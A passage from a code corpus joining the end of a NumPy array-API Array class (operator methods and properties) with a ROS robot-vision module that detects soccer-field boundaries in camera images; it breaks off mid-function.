the operation __rlshift__. """ other = self._check_allowed_dtypes(other, "integer", "__rlshift__") if other is NotImplemented: return other self, other = self._normalize_two_args(self, other) res = self._array.__rlshift__(other._array) return self.__class__._new(res) def __imatmul__(self: Array, other: Array, /) -> Array: """ Performs the operation __imatmul__. """ # Note: NumPy does not implement __imatmul__. # matmul is not defined for scalars, but without this, we may get # the wrong error message from asarray. other = self._check_allowed_dtypes(other, "numeric", "__imatmul__") if other is NotImplemented: return other # __imatmul__ can only be allowed when it would not change the shape # of self. other_shape = other.shape if self.shape == () or other_shape == (): raise ValueError("@= requires at least one dimension") if len(other_shape) == 1 or other_shape[-1] != other_shape[-2]: raise ValueError("@= cannot change the shape of the input array") self._array[:] = self._array.__matmul__(other._array) return self def __rmatmul__(self: Array, other: Array, /) -> Array: """ Performs the operation __rmatmul__. """ # matmul is not defined for scalars, but without this, we may get # the wrong error message from asarray. other = self._check_allowed_dtypes(other, "numeric", "__rmatmul__") if other is NotImplemented: return other res = self._array.__rmatmul__(other._array) return self.__class__._new(res) def __imod__(self: Array, other: Union[int, float, Array], /) -> Array: """ Performs the operation __imod__. """ other = self._check_allowed_dtypes(other, "numeric", "__imod__") if other is NotImplemented: return other self._array.__imod__(other._array) return self def __rmod__(self: Array, other: Union[int, float, Array], /) -> Array: """ Performs the operation __rmod__. 
""" other = self._check_allowed_dtypes(other, "numeric", "__rmod__") if other is NotImplemented: return other self, other = self._normalize_two_args(self, other) res = self._array.__rmod__(other._array) return self.__class__._new(res) def __imul__(self: Array, other: Union[int, float, Array], /) -> Array: """ Performs the operation __imul__. """ other = self._check_allowed_dtypes(other, "numeric", "__imul__") if other is NotImplemented: return other self._array.__imul__(other._array) return self def __rmul__(self: Array, other: Union[int, float, Array], /) -> Array: """ Performs the operation __rmul__. """ other = self._check_allowed_dtypes(other, "numeric", "__rmul__") if other is NotImplemented: return other self, other = self._normalize_two_args(self, other) res = self._array.__rmul__(other._array) return self.__class__._new(res) def __ior__(self: Array, other: Union[int, bool, Array], /) -> Array: """ Performs the operation __ior__. """ other = self._check_allowed_dtypes(other, "integer or boolean", "__ior__") if other is NotImplemented: return other self._array.__ior__(other._array) return self def __ror__(self: Array, other: Union[int, bool, Array], /) -> Array: """ Performs the operation __ror__. """ other = self._check_allowed_dtypes(other, "integer or boolean", "__ror__") if other is NotImplemented: return other self, other = self._normalize_two_args(self, other) res = self._array.__ror__(other._array) return self.__class__._new(res) def __ipow__(self: Array, other: Union[float, Array], /) -> Array: """ Performs the operation __ipow__. """ other = self._check_allowed_dtypes(other, "floating-point", "__ipow__") if other is NotImplemented: return other self._array.__ipow__(other._array) return self def __rpow__(self: Array, other: Union[float, Array], /) -> Array: """ Performs the operation __rpow__. """ from ._elementwise_functions import pow other = self._check_allowed_dtypes(other, "floating-point", "__rpow__") if other is NotImplemented: return other # Note: NumPy's __pow__ does not follow the spec type promotion rules # for 0-d arrays, so we use pow() here instead. return pow(other, self) def __irshift__(self: Array, other: Union[int, Array], /) -> Array: """ Performs the operation __irshift__. """ other = self._check_allowed_dtypes(other, "integer", "__irshift__") if other is NotImplemented: return other self._array.__irshift__(other._array) return self def __rrshift__(self: Array, other: Union[int, Array], /) -> Array: """ Performs the operation __rrshift__. """ other = self._check_allowed_dtypes(other, "integer", "__rrshift__") if other is NotImplemented: return other self, other = self._normalize_two_args(self, other) res = self._array.__rrshift__(other._array) return self.__class__._new(res) def __isub__(self: Array, other: Union[int, float, Array], /) -> Array: """ Performs the operation __isub__. """ other = self._check_allowed_dtypes(other, "numeric", "__isub__") if other is NotImplemented: return other self._array.__isub__(other._array) return self def __rsub__(self: Array, other: Union[int, float, Array], /) -> Array: """ Performs the operation __rsub__. """ other = self._check_allowed_dtypes(other, "numeric", "__rsub__") if other is NotImplemented: return other self, other = self._normalize_two_args(self, other) res = self._array.__rsub__(other._array) return self.__class__._new(res) def __itruediv__(self: Array, other: Union[float, Array], /) -> Array: """ Performs the operation __itruediv__. 
""" other = self._check_allowed_dtypes(other, "floating-point", "__itruediv__") if other is NotImplemented: return other self._array.__itruediv__(other._array) return self def __rtruediv__(self: Array, other: Union[float, Array], /) -> Array: """ Performs the operation __rtruediv__. """ other = self._check_allowed_dtypes(other, "floating-point", "__rtruediv__") if other is NotImplemented: return other self, other = self._normalize_two_args(self, other) res = self._array.__rtruediv__(other._array) return self.__class__._new(res) def __ixor__(self: Array, other: Union[int, bool, Array], /) -> Array: """ Performs the operation __ixor__. """ other = self._check_allowed_dtypes(other, "integer or boolean", "__ixor__") if other is NotImplemented: return other self._array.__ixor__(other._array) return self def __rxor__(self: Array, other: Union[int, bool, Array], /) -> Array: """ Performs the operation __rxor__. """ other = self._check_allowed_dtypes(other, "integer or boolean", "__rxor__") if other is NotImplemented: return other self, other = self._normalize_two_args(self, other) res = self._array.__rxor__(other._array) return self.__class__._new(res) def to_device(self: Array, device: Device, /, stream: None = None) -> Array: if stream is not None: raise ValueError("The stream argument to to_device() is not supported") if device == 'cpu': return self raise ValueError(f"Unsupported device {device!r}") @property def dtype(self) -> Dtype: """ Array API compatible wrapper for :py:meth:`np.ndarray.dtype <numpy.ndarray.dtype>`. See its docstring for more information. """ return self._array.dtype @property def device(self) -> Device: return "cpu" # Note: mT is new in array API spec (see matrix_transpose) @property def mT(self) -> Array: from .linalg import matrix_transpose return matrix_transpose(self) @property def ndim(self) -> int: """ Array API compatible wrapper for :py:meth:`np.ndarray.ndim <numpy.ndarray.ndim>`. See its docstring for more information. """ return self._array.ndim @property def shape(self) -> Tuple[int, ...]: """ Array API compatible wrapper for :py:meth:`np.ndarray.shape <numpy.ndarray.shape>`. See its docstring for more information. """ return self._array.shape @property def size(self) -> int: """ Array API compatible wrapper for :py:meth:`np.ndarray.size <numpy.ndarray.size>`. See its docstring for more information. """ return self._array.size @property def T(self) -> Array: """ Array API compatible wrapper for :py:meth:`np.ndarray.T <numpy.ndarray.T>`. See its docstring for more information. """ # Note: T only works on 2-dimensional arrays. See the corresponding # note in the specification: # https://data-apis.org/array-api/latest/API_specification/array_object.html#t if self.ndim != 2: raise ValueError("x.T requires x to have 2 dimensions. Use x.mT to transpose stacks of matrices and permute_dims() to permute dimensions.") return self.__class__._new(self._array.T)
the-stack_106_24406
import numpy as np import cv2 import rospy import abc import math import tf2_ros as tf2 from tf.transformations import euler_from_quaternion from .color import ColorDetector from operator import itemgetter class FieldBoundaryDetector(object): """ The abstract class :class:`.FieldBoundaryDetector` is used for detecting the field boundary in various ways. The task of such a detector is the localisation of the edges of the field in the image. It returns a list of points that form this so called field boundary. It requires the ColorDetector to find the green pixels that are used to identify the field in the picture. The pixels of the field boundary are found by traversing the picture column wise in steps of a given length. Because obstacles can obscure the edges of the field, sometimes the first green pixel from the top of the picture is found at the bottom of the respective obstacle. Therefore not all of the points are located in a straight line and the field boundary contains multiple dents. Additionally white field markings and green pixels in the field that are false negatives can create small dents too. Besides the normal field boundary, the :class:`.FieldBoundaryDetector` can also create a convex field boundary that forms a convex hull over the dents of the detected field boundary and is therefore completely straight (with the exception of the corners of the field). """ def __init__(self, config, field_color_detector): # type: (dict, ColorDetector) -> None """ Initialization of :class:`.FieldBoundaryDetector`. :param config: the configuration contained in visionparams.yaml :param field_color_detector: checks whether a color is part of the field colors """ # set variables: self._image = None self._field_boundary_points = None self._field_boundary_full = None self._convex_field_boundary_points = None self._convex_field_boundary_full = None self._mask = None self._algorithm = None self._field_color_detector = field_color_detector # init config: self._x_steps = config['field_boundary_detector_horizontal_steps'] self._y_steps = config['field_boundary_detector_vertical_steps'] self._roi_height = config['field_boundary_detector_roi_height'] self._roi_width = config['field_boundary_detector_roi_width'] self._roi_increase = config['field_boundary_detector_roi_increase'] self._green_threshold = config['field_boundary_detector_green_threshold'] # Set if values should be cached self._caching = config['caching'] @staticmethod def get_by_name(search_method): # type: (String) -> FieldBoundaryDetector """ Returns the matching field boundary detector for an String. :param image: the current frame of the video feed """ detectors = { 'dynamic': DynamicFieldBoundaryDetector, 'binary': BinaryFieldBoundaryDetector, 'reversed': ReversedFieldBoundaryDetector, 'downsampling_reversed': DownsamplingReversedFieldBoundaryDetector, 'iteration': IterationFieldBoundaryDetector, } return detectors[search_method] def set_image(self, image): # type: (np.matrix) -> None """ Refreshes the variables after receiving an image. 
:param image: the current frame of the video feed """ self._image = image self._field_boundary_points = None self._field_boundary_full = None self._convex_field_boundary_full = None self._convex_field_boundary_points = None self._mask = None def get_mask(self, offset=0): # type: () -> np.array """ :param offset: A vertical field boundary offset shift :return: np.array """ # Compute mask (cached) self._compute_mask() return self._shift_field_boundary_mask(self._mask, offset) def _shift_field_boundary_mask(self, mask, offset): shape = mask.shape if offset == 0: return mask elif offset < 0: # Shift mask downwards offset = min(-offset, shape[0]-1) frame = np.zeros(shape, dtype=np.uint8) # Add mask with offset frame[offset:shape[0]-1] = mask[0:shape[0]-1-offset] elif offset > 0: # Shift mask upwards offset = min(offset, shape[0]-1) frame = np.ones(shape, dtype=np.uint8) frame = frame * 255 # Add mask with offset frame[0:shape[0]-1-offset] = mask[offset:shape[0]-1] return frame def _compute_mask(self): # type: () -> None """ Calculates a mask that contains white pixels below the field-boundary """ # Check if field boundary is already cached if self._mask is None or not self._caching: shape = np.shape(self._image) img_size = (shape[0], shape[1]) # Generates a white canvas canvas = np.ones(img_size, dtype=np.uint8) * 255 hpoints = np.array([[(0, 0)] + self.get_field_boundary_points() + [(shape[1] - 1, 0)]]) # Blacks out the part over the field_boundary self._mask = cv2.fillPoly(canvas, hpoints, 0) def get_field_boundary_points(self, offset=0): # type: (int) -> list """ calculates the field-boundary if not calculated yet and returns a list containing coordinates on the picture where the field-boundary is. the offset works UPWARDS! :return list of x,y tuples of the field_boundary: """ if self._field_boundary_points is None or not self._caching: self._compute_field_boundary_points() # applying the offset if offset != 0: return [(point[0], point[1] - offset) for point in self._field_boundary_points] return self._field_boundary_points def _compute_field_boundary_points(self): """ calls the method to compute the field boundary points and saves it in the class variable _field_boundary_points """ self._field_boundary_points = self._algorithm._calculate_field_boundary( self._image, self._field_color_detector, self._x_steps, self._y_steps, self._roi_height, self._roi_width, self._roi_increase, self._green_threshold) def get_convex_field_boundary_points(self): ''' returns a set of field_boundary points that form a convex hull of the field ''' if self._convex_field_boundary_points is None or not self._caching: self._compute_convex_field_boundary_points() return self._convex_field_boundary_points def _compute_convex_field_boundary_points(self): """ returns a set of field_boundary points that form a convex hull of the field """ field_boundary_points = self.get_field_boundary_points() # calculate the "convex hull" of the field_boundary points self._convex_field_boundary_points = self._graham(field_boundary_points) def _graham(self, points): ''' This is a modified Graham's convex hull algorithm. Instead of returning the list of points that form the entire convex hull of the input point set, it returns only the "half" of the hull which has the lower y-coordinates and spans between the points with x=0 and x=self._image.shape[1]-1. 
:param points: list of points (a point is a 2D array (x,y)) with increasing x-coordinates, including one point with x = 0 and one point with x = self._image.shape[1]-1 :return: list of points, see above for more detail ''' if len(points) < 3: # there is no convex hull if less than three points are given return points # sort by increasing x-coordinates, then sort points with the same x-coordinate # by increasing y-coordinates my_points = sorted(points, key=lambda p: (p[0] + 1) * self._image.shape[1] + p[1]) # take the bottommost point p0 = my_points[0] # sort the points according to the angle between the vector p0 -> p # and the inverted y-axis my_points[1:] = sorted(my_points[1:], key=lambda p: self._graham_point_sort(p, p0)) num_points = len(my_points) # the stack contains the current hull points, top of the stack is the # last element in the list stack = [my_points[0], my_points[1]] i = 2 while (i < num_points) and (stack[-1][0] != self._image.shape[1] - 1): if len(stack) < 2 or self._ccw(stack[-1], stack[-2], my_points[i]) <= 0: # extend the hull stack.append(my_points[i]) i += 1 else: # an interior angle > 180 degrees is located at the last point in the hull, # thus this point cannot be part of the convex hull stack.pop() return stack def _graham_point_sort(self, p, p0): ''' used to sort the points given to Graham's convex hull algorithm returns the cosine of the angle between the vector p0->p and the inverted y-axis (the vector (0,-1)) ''' return -(p0[1] - p[1]) / (np.sqrt((p[0] - p0[0]) ** 2 + (p[1] - p0[1]) ** 2)) def _ccw(self, p1, p2, p3): ''' returns whether the given points p1, p2 and p3 are counter-clockwise (returns a value > 0) clockwise (returns a value < 0) or collinear (returns 0) to each other ''' return (p2[0] - p1[0]) * (p3[1] - p1[1]) - (p2[1] - p1[1]) * (p3[0] - p1[0]) def _compute_full_field_boundary(self): if self._field_boundary_full is None or not self._caching: xp, fp = zip(*self.get_field_boundary_points()) x = list(range(self._image.shape[1])) self._field_boundary_full = np.interp(x, list(xp), list(fp)) def get_full_field_boundary(self): # type: () -> list """ Calculates an interpolated list of y coordinates where the field_boundary is for the picture the index of the y value is the x coordinate on the picture. :return list of y coordinates where the field_boundary is. Index of y value is the x coordinate: """ self._compute_full_field_boundary() return self._field_boundary_full def _compute_full_convex_field_boundary(self): # type: () -> list """ Calculates an interpolated list of y coordinates where the convex field_boundary is for the picture the index of the y value is the x coordinate on the picture. :return list of y coordinates where the convex field_boundary is. Index of y value is the x coordinate: """ if self._convex_field_boundary_full is None or not self._caching: xp, fp = zip(*self.get_convex_field_boundary_points()) x = list(range(self._image.shape[1])) self._convex_field_boundary_full = np.interp(x, list(xp), list(fp)) def get_full_convex_field_boundary(self): # type: () -> list """ Calculates an interpolated list of y coordinates where the convex field_boundary is for the picture the index of the y value is the x coordinate on the picture. :return list of y coordinates where the convex field_boundary is. 
Index of y value is the x coordinate: """ self._compute_full_convex_field_boundary() return self._convex_field_boundary_full def candidate_under_field_boundary(self, candidate, y_offset=0): # type: (tuple, int) -> bool """ Returns whether the candidate is under the field_boundary or not. :param candidate: the candidate :param y_offset: an offset in y-direction (higher offset allows points in a wider range over the field_boundary) :return: whether the candidate is under the field_boundary or not """ footpoint = candidate.get_lower_center_point() footpoint_with_offset = (footpoint[0], footpoint[1] + y_offset) return self.point_under_field_boundary(footpoint_with_offset) def candidate_under_convex_field_boundary(self, candidate, y_offset=0): # type: (tuple, int) -> bool """ Returns whether the candidate is under the convex field_boundary or not. :param candidate: the candidate :param y_offset: an offset in y-direction (higher offset allows points in a wider range over the field_boundary) :return: whether the candidate is under the convex field_boundary or not """ footpoint = candidate.get_lower_center_point() footpoint_with_offset = (footpoint[0], footpoint[1] + y_offset) return self.point_under_convex_field_boundary(footpoint_with_offset) def candidates_under_field_boundary(self, candidates, y_offset=0): # type: (list, int) -> list """ Removes candidates that are not under the field boundary from list. :param balls: list of all candidates :param y_offset: If the ball is within this offset over the field boundary its still accepted. :return: list of candidates under the field boundary """ return [candidate for candidate in candidates if self.candidate_under_field_boundary(candidate, y_offset)] def candidates_under_convex_field_boundary(self, candidates, y_offset=0): # type: (list, int) -> list """ Removes candidates that are not under the convex field boundary from list. :param balls: list of all candidates :param y_offset: If the ball is within this offset over the field boundary its still accepted. :return: list of candidates under convex the field boundary """ return [candidate for candidate in candidates if self.candidate_under_convex_field_boundary(candidate, y_offset)] def point_under_field_boundary(self, point, offset=0): # type: (tuple, int) -> bool """ Returns if given coordinate is a point under field_boundary. :param point: coordinate (x, y) to test :param offset: offset of pixels to still be accepted as under the field_boundary. Default is 0. :return a boolean if point is under field_boundary: """ if not 0 <= point[0] < len(self.get_full_field_boundary()): rospy.logwarn('point_under_field_boundary got called with an out of bounds field_boundary point', logger_name="vision_field_boundary") return False return point[1] + offset > self.get_full_field_boundary()[point[0]] def point_under_convex_field_boundary(self, point, offset=0): # type: (tuple, int) -> bool """ Returns if given coordinate is a point under the convex field_boundary. :param point: coordinate (x, y) to test :param offset: offset of pixels to still be accepted as under the field_boundary. Default is 0. 
:return a boolean if point is under the convex field_boundary: """ if not 0 <= point[0] < len(self.get_full_convex_field_boundary()): rospy.logwarn('point_under_field_boundary got called with an out of bounds field_boundary point', logger_name="vision_field_boundary") return False return point[1] + offset > self.get_full_convex_field_boundary()[point[0]] def get_upper_bound(self, y_offset=0): # type: () -> int """ Returns the y-value of highest point of the field_boundary (lowest y-value). :return: int(), y-value of highest point of the field_boundary (lowest y-value) """ return max(0, int(min(self.get_field_boundary_points(), key=itemgetter(1))[1] - y_offset)) def _equalize_points(self, points): # type: (list) -> list """ Returns a list of the input points with smoothed y-coordinates to reduce the impact of outlier points in the field_boundary, which are caused by detection errors. :param points: list of input points consisting of tuples (x, y) :return: list of input points with smoothed y-coordinates consisting of tuples (x, y) """ equalized_points = list() equalized_points.append(points[0]) buffer0 = points[0] buffer1 = points[1] for i in range(2, len(points)): buffer2 = points[i] equalized_points.append((buffer1[0], int(round((((buffer0[1] + buffer2[1]) / 2.0) + buffer1[1]) / 2.0)))) buffer0 = buffer1 buffer1 = buffer2 equalized_points.append(points[-1]) return equalized_points class IterationFieldBoundaryDetector(FieldBoundaryDetector): """ The :class:`.IterationFieldBoundaryDetector` uses the iteration detection method and finds the field boundary via scan lines running down from top to bottom. """ def __init__(self, config, field_color_detector): """ Initialization of :class:`.IterationFieldBoundaryDetector`. :param config: the configuration contained in visionparams.yaml :param field_color_detector: checks whether a color is part of the field colors """ super(IterationFieldBoundaryDetector, self).__init__(config, field_color_detector) self._algorithm = IterationFieldBoundaryAlgorithm class BinaryFieldBoundaryDetector(FieldBoundaryDetector): """ The :class:`.BinaryFieldBoundaryDetector` uses the binary detection method and finds the field boundary via binary search. """ def __init__(self, config, field_color_detector): """ Initialization of :class:`.BinaryFieldBoundaryDetector`. :param config: the configuration contained in visionparams.yaml :param field_color_detector: checks whether a color is part of the field colors """ super(BinaryFieldBoundaryDetector, self).__init__(config, field_color_detector) self._algorithm = BinaryFieldBoundaryAlgorithm class ReversedFieldBoundaryDetector(FieldBoundaryDetector): """ The :class:`.ReversedFieldBoundaryDetector` uses the reversed detection method and finds the field boundary via scan lines running up from bottom to top. """ def __init__(self, config, field_color_detector): """ Initialization of :class:`.ReversedFieldBoundaryDetector::. :param config: the configuration contained in visionparams.yaml :param field_color_detector: checks whether a color is part of the field colors """ super(ReversedFieldBoundaryDetector, self).__init__(config, field_color_detector) self._algorithm = ReversedFieldBoundaryAlgorithm class DownsamplingReversedFieldBoundaryDetector(FieldBoundaryDetector): """ The :class:`.DownsamplingReversedFieldBoundaryDetector` samples the resolution down and uses the reversed detection method and finds the field boundary via scan lines running up from bottom to top. 
""" def __init__(self, config, field_color_detector): """ Initialization of the DownsamplingReversedFieldBoundaryDetector. :param config: the configuration contained in visionparams.yaml :param field_color_detector: checks whether a color is part of the field colors """ super(DownsamplingReversedFieldBoundaryDetector, self).__init__(config, field_color_detector) self._algorithm = DownsamplingReversedFieldBoundaryAlgorithm class DynamicFieldBoundaryDetector(FieldBoundaryDetector): """ The :class:`.DynamicFieldBoundaryDetector` switches dynamically between the iteration and reversed iteration method depending on how much the robot's head is tilted. This improves performance (iteration) and enables operation with two field next to each other (reversed). """ def __init__(self, config, field_color_detector): """ Initialization of the DynamicFieldBoundaryDetector :param config: the configuration contained in visionparams.yaml :param field_color_detector: checks whether a color is part of the field colors """ super(DynamicFieldBoundaryDetector, self).__init__(config, field_color_detector) self._over_horizon_algorithm = ReversedFieldBoundaryAlgorithm self._under_horizon_algorithm = IterationFieldBoundaryAlgorithm self._base_frame = "camera_optical_frame" self._camera_frame = "base_footprint" self._tilt_threshold = math.radians(config['field_boundary_detector_head_tilt_threshold']) # TF stuff self._tf_buffer = tf2.Buffer(cache_time=rospy.Duration(5)) self._tf_listener = tf2.TransformListener(self._tf_buffer) def _only_field_visible(self): """ Check head orientation and decide if we should use the iteration or reversed iteration method. """ # Check if we can use tf. Otherwise switch to reversed iteration detector try: # Get quaternion from newest tf orientation = self._tf_buffer.lookup_transform(self._camera_frame, self._base_frame, rospy.Time(0)).transform.rotation # Convert into an usable tilt angle tilt_angle = (1.5 * math.pi - euler_from_quaternion(( orientation.x, orientation.y, orientation.z, orientation.w))[0]) % (2 * math.pi) # Check if it satisfied the threshold if tilt_angle > self._tilt_threshold and tilt_angle < math.pi: return True else: return False # Switch to reversed iteration detector except tf2.LookupException: rospy.logwarn_throttle(2, "TF for dynamic field boundary algorithm selection not active. Maybe TF becomes avalabile in a few seconds. Using reversed iteration method instead", logger_name="vision_field_boundary") return False except tf2.ExtrapolationException as ecp: # Warn user rospy.logwarn_throttle(2, "Extrapolation exception! Not able to use tf for dynamic field boundary algorithm selection. Using reversed iteration method instead", logger_name="vision_field_boundary") return False except tf2.ConnectivityException as ecp: # Warn user rospy.logwarn_throttle(2, "Connectivity exception! Not able to use tf for dynamic field boundary algorithm selection. Using reversed iteration method instead. 
\n" + ecp) return False def _compute_field_boundary_points(self): """ Calls the method to compute the field boundary and saves it in the class variable _field_boundary_points """ if self._only_field_visible(): self._algorithm = self._under_horizon_algorithm else: self._algorithm = self._over_horizon_algorithm # Calc field boundary super(DynamicFieldBoundaryDetector, self)._compute_field_boundary_points() class FieldBoundaryAlgorithm(): """ The abstract :class:`.FieldBoundaryAlgorithm` defines the interface for a field boundary algorithm, which finds the points of the field boundary visible in the image. """ @abc.abstractmethod def _calculate_field_boundary(_image, _field_color_detector, _x_steps, _y_steps, _roi_height, _roi_width, _roi_increase, _green_threshold): """ Finds the points of the field boundary in the image. :param np.ndarray _image: Image to calculate the field boundary on :param _field_color_detector: ColorDetector to detect field :type _field_color_detector: :class:`bitbots_vision.vision_module.color.ColorDetector` :param int _x_steps: Number of horizontal steps :param int _y_steps: Number of vertical steps :param int _roi_height: Height of Region Of Interest in which we are looking for green :param int _roi_width: Width of Region Of Interest in which we are looking for green :param int _roi_increase: Value that increases the region of interest, if it is located lower in the image :param int _green_threshold: Threshold of green in the area covered by the kernel :returns [(int, int)]: list of field boundary points """ raise NotImplementedError class IterationFieldBoundaryAlgorithm(FieldBoundaryAlgorithm): """ The :class:`.IterationFieldBoundaryAlgorithm` finds the points of the field boundary visible in the image. Uses the standard method, iterating from top to bottom until it finds enough green points. """ @staticmethod def _calculate_field_boundary(_image, _field_color_detector, _x_steps, _y_steps, _roi_height, _roi_width, _roi_increase, _green_threshold): # calculate the field_mask which contains 0 for non-green pixels and 255 for green pixels in the image field_mask = _field_color_detector.get_mask_image() # noise reduction on the field_mask: field_mask = cv2.morphologyEx( field_mask, cv2.MORPH_CLOSE, np.ones((5, 5), dtype=np.uint8), iterations=2) # Syntax: cv2.resize(image, (width, height), type of interpolation) field_mask = cv2.resize(field_mask, (_x_steps, _y_steps), interpolation=cv2.INTER_LINEAR) # the stepsize is the number of pixels traversed in the image by going one step y_stepsize = (_image.shape[0] - 1) / float(_y_steps - 1) x_stepsize = (_image.shape[1] - 1) / float(_x_steps - 1) min_y = _image.shape[0] - 1 _field_boundary_points = [] for x_step in range(_x_steps): # traverse columns firstgreen = min_y # set field_boundary point to worst case x = int(round(x_step * x_stepsize)) # get x value of step (depends on image size) for y_step in range(_y_steps): # traverse rows y = int(round(y_step * y_stepsize)) # get y value of step (depends on image size) if field_mask[y_step, x_step] > 100: # when the pixel is in the color lookup table firstgreen = y break _field_boundary_points.append((x, firstgreen)) return _field_boundary_points class ReversedFieldBoundaryAlgorithm(FieldBoundaryAlgorithm): """ The :class:`.ReversedFieldBoundaryAlgorithm` finds the points of the field boundary visible in the image. Uses the reversed method iterating from bottom to top until it finds enough non green points. Useful for when two fields are adjacent to each other. 
""" @staticmethod def _calculate_field_boundary(_image, _field_color_detector, _x_steps, _y_steps, _roi_height, _roi_width, _roi_increase, _green_threshold): # calculate the field_mask which contains 0 for non-green pixels and 255 for green pixels in the image field_mask = _field_color_detector.get_mask_image() # noise reduction on the field_mask: # the stepsize is the number of pixels traversed in the image by going one step y_stepsize = (_image.shape[0] - 1) / float(_y_steps - 1) x_stepsize = (_image.shape[1] - 1) / float(_x_steps - 1) # the region of interest (roi) for a specific point is a rectangle with the point in the middle of its top row # the point is slightly left of center when the width is even roi_start_height_y = _roi_height roi_start_width_x = _roi_width roi_start_radius_x = roi_start_width_x // 2 # increase of roi radius per pixel, e.g. 0.1 increases the radius by 1 for every 10 pixels # this accommodates for size difference of objects in the image depending on their distance # and therefore height in image: roi_increase = _roi_increase # height/width/radius-in-x-direction of the roi after maximum increase at the bottom of the image roi_max_height_y = roi_start_height_y + int(_image.shape[0] * roi_increase * 2) roi_max_width_x = roi_start_width_x + int(_image.shape[0] * roi_increase * 2) roi_max_radius_x = roi_max_width_x // 2 # extents the outermost pixels of the image as the roi will go beyond the image at the edges # Syntax: cv2.copyMakeBorder(image, top, bottom, left, right, type of extension) field_mask = cv2.copyMakeBorder(field_mask, roi_start_height_y, 0, roi_max_radius_x, roi_max_radius_x, cv2.BORDER_REPLICATE) # uncomment this to use a kernel for the roi kernel = np.ones((roi_max_height_y, roi_max_width_x)) # creates a kernel with 0 everywhere # use this to fill in other values at specific places in the kernel kernel[0: int(roi_max_height_y // 5), int(roi_max_width_x // 2.2): int(roi_max_width_x - roi_max_width_x // 2.2)] = 10 green_threshold = _green_threshold _field_boundary_points = [] for x_step in range(_x_steps): # traverse columns (x_steps) top_green = roi_start_height_y # set field_boundary point to worst case # calculate the x coordinate in the image of a column: x_image = int(round(x_step * x_stepsize)) + roi_max_radius_x for y_step in range(_y_steps): # calculate the y coordinate in the image of a y_step: y_image = int(_image.shape[0] - (round(y_step * y_stepsize))) + roi_start_height_y # creates the roi for a point (y_image, x_image) roi_current_radius_x = roi_start_radius_x + int(y_image * roi_increase) roi_current_height_y = roi_start_height_y + int(y_image * roi_increase * 2) roi = field_mask[y_image - roi_current_height_y:y_image, x_image - (roi_current_radius_x - 1):x_image + roi_current_radius_x] # roi_mean = roi.mean() roi_mean = (roi * kernel[roi_current_height_y - 1, roi_current_radius_x * 2 - 1]).mean() # uncomment when using a kernel if roi_mean <= green_threshold: top_green = y_image break _field_boundary_points.append((x_image - roi_max_radius_x, top_green)) return _field_boundary_points class DownsamplingReversedFieldBoundaryAlgorithm(FieldBoundaryAlgorithm): """ The :class:`.DownsamplingReversedFieldBoundaryAlgorithm` finds the points of the field boundary visible in the image. Uses the reversed method iterating from bottom to top on a downsampled image until it finds enough non green points. Useful for when two fields are adjacent to each other. 
""" @staticmethod def _calculate_field_boundary(image, field_color_detector, x_steps, y_steps, roi_height, roi_width, roi_increase, green_threshold): # calculate the field_mask which contains 0 for non-green pixels and 255 for green pixels in the image field_mask = field_color_detector.get_mask_image() # Scale the image down subsampled_mask = cv2.resize(field_mask,(x_steps,y_steps), interpolation=cv2.INTER_AREA) # Define the blur kernel kernel = (2 * (roi_width // 2) + 1, 2 * (roi_height // 2) + 1) # Blur the downscaled image to fill holes in the field mask subsampled_mask = cv2.GaussianBlur(subsampled_mask, kernel, 0) field_boundary_points = [] # Iterate horizontally over the image for x_position in range(subsampled_mask.shape[1]): # Iterate vertically over the downscaled mask for y_position in range(subsampled_mask.shape[0]): # Invert the current vertical value max_y = (subsampled_mask.shape[0] - 1) - y_position # Check if we found a pixel under the threshold if subsampled_mask[max_y, x_position] < int(green_threshold / 1000 * 255): # Reset to last step max_y += roi_height // 2 break # Scale the field boundary points back to the original image field_boundary_points.append( (int((x_position + 0.5) * (field_mask.shape[1] / x_steps)), int(max_y * (field_mask.shape[0] / y_steps)))) # Fix a little offset at the image edges on the right and left field_boundary_points[0] = (0, field_boundary_points[0][1]) field_boundary_points[-1] = (field_mask.shape[1]-1, field_boundary_points[-1][1]) return field_boundary_points class BinaryFieldBoundaryAlgorithm(FieldBoundaryAlgorithm): """ The :class:`.BinaryFieldBoundaryAlgorithm` finds the points of the field boundary visible in the image. Uses a faster binary search method, that unfortunately finds some points below field lines. """ @staticmethod def _calculate_field_boundary(_image, _field_color_detector, _x_steps, _y_steps, _roi_height, _roi_width, _roi_increase, _green_threshold): # calculate the field_mask which contains 0 for non-green pixels and 255 for green pixels in the image field_mask = _field_color_detector.get_mask_image() # noise reduction on the field_mask: field_mask = cv2.morphologyEx( field_mask, cv2.MORPH_CLOSE, np.ones((5, 5), dtype=np.uint8), iterations=2) # the stepsize is the number of pixels traversed in the image by going one step y_stepsize = (_image.shape[0] - 1) / float(_y_steps - 1) x_stepsize = (_image.shape[1] - 1) / float(_x_steps - 1) # the region of interest (roi) for a specific point is a rectangle # with the point in the middle of its top row; the point is slightly left of center when the width is even roi_start_height_y = _roi_height roi_start_width_x = _roi_width roi_start_radius_x = roi_start_width_x // 2 # increase of roi radius per pixel, e.g. 
0.1 increases the radius by 1 for every 10 pixels # this accommodates for size difference of objects in the image depending on their distance # and therefore height in image: roi_increase = _roi_increase # height/width/radius-in-x-direction of the roi after maximum increase at the bottom of the image roi_max_height_y = roi_start_height_y + int(_image.shape[0] * roi_increase * 2) roi_max_width_x = roi_start_width_x + int(_image.shape[0] * roi_increase * 2) roi_max_radius_x = roi_max_width_x // 2 # extents the outermost pixels of the image as the roi will go beyond the image at the edges # Syntax: cv2.copyMakeBorder(image, top, bottom, left, right, type of extension) field_mask = cv2.copyMakeBorder(field_mask, 0, roi_max_height_y, roi_max_radius_x, roi_max_radius_x, cv2.BORDER_REPLICATE) # uncomment this to use a kernel for the roi # kernel = np.zeros((roi_height, roi_width)) # creates a kernel with 0 everywhere # kernel[int(kernel_height/2):, :] = 1 # use this to fill in other values at specific places in the kernel green_threshold = _green_threshold _field_boundary_points = [] for x_step in range(0, _x_steps): # traverse columns (x_steps) roi_mean = 0 y_step = 0 roi_current_height_y = 0 # binary search for finding the first green pixel: first = 0 # top of the column last = _y_steps - 1 # bottom of the column # calculate the x coordinate in the image of a column: x_image = int(round(x_step * x_stepsize)) + roi_max_radius_x while first < last: y_step = (first + last) // 2 y_image = int(round(y_step * y_stepsize)) # calculate the y coordinate in the image of a y_step # creates the roi for a point (y_image, x_image) roi_current_radius_x = roi_start_radius_x + int(y_image * roi_increase) roi_current_height_y = roi_start_height_y + int(y_image * roi_increase * 2) roi = field_mask[y_image:y_image + roi_current_height_y, x_image - (roi_current_radius_x - 1):x_image + roi_current_radius_x] roi_mean = roi.mean() # roi_mean = 